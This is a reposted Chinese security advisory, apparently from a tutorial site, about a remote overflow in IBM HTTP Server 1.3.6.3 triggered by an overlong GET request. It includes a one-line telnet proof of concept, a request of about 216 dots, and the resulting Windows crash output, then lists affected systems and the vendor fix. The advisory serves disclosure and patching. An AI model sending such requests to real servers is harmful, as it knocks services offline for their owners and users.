IBM HTTP Server 远程溢出漏洞

苗大侠566

苗大侠566

2016-02-19 15:12

想要天天向上,就要懂得享受学习。图老师为大家推荐IBM HTTP Server 远程溢出漏洞,精彩的内容需要你们用心的阅读。还在等什么快点来看看吧!
涉及程序:
  GET
  
  描述:
  通过提交超长的GET请求导致IBM HTTP Server远程溢出
  
  
  详细:
  IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。
  
  如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
  
  
  以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
  
  
  $ telnet target 80
  GET /......(216个".")aaa HTTP/1.0
  
  则系统会报告下列错误信息:
  ***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
  ON_NOT_HANDLED.
  ***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
  注意:目标主机运行在Windows 2000下。
  
  受影响的系统
  IBM HTTP Server 1.3.6.3
  - TurboLinux Turbo Linux 3.0.1
  - Sun Solaris 2.6
  - S.u.S.E. Linux 6.1
  - S.u.S.E. Linux 6.0
  - RedHat Linux 6.0 sparc
  - RedHat Linux 5.2 sparc
  - Microsoft Windows NT 4.0
  - IBM AIX 4.2.1
  - Caldera OpenLinux 2.2
  
  解决方案:
  IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
  http://www-4.ibm.com/software/webservers/httpservers/download.html
  
展开更多 50%)
分享

猜你喜欢

IBM HTTP Server 远程溢出漏洞

Web开发
IBM HTTP Server 远程溢出漏洞

通过提交超长的GET请求导致IBM HTTP Server远程溢出

Java JAVA基础
通过提交超长的GET请求导致IBM HTTP Server远程溢出

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

写远程缓冲区溢出漏洞利用程序

编程语言 网络编程
写远程缓冲区溢出漏洞利用程序

IBM WebSphere Application Server 3.0.2 存在暴露源代码漏洞

Java JAVA基础
IBM WebSphere Application Server 3.0.2 存在暴露源代码漏洞

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

IBM WebSphere源代码暴露漏洞

Web开发
IBM WebSphere源代码暴露漏洞

IBM WebSphere Application Server 暴露JSP文件内容

Java JAVA基础
IBM WebSphere Application Server 暴露JSP文件内容

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

极简风格Web架构jsp+jdbc的二次复辟

极简风格Web架构jsp+jdbc的二次复辟

Excel中IsEmpty函数用法

Excel中IsEmpty函数用法
下拉加载更多内容 ↓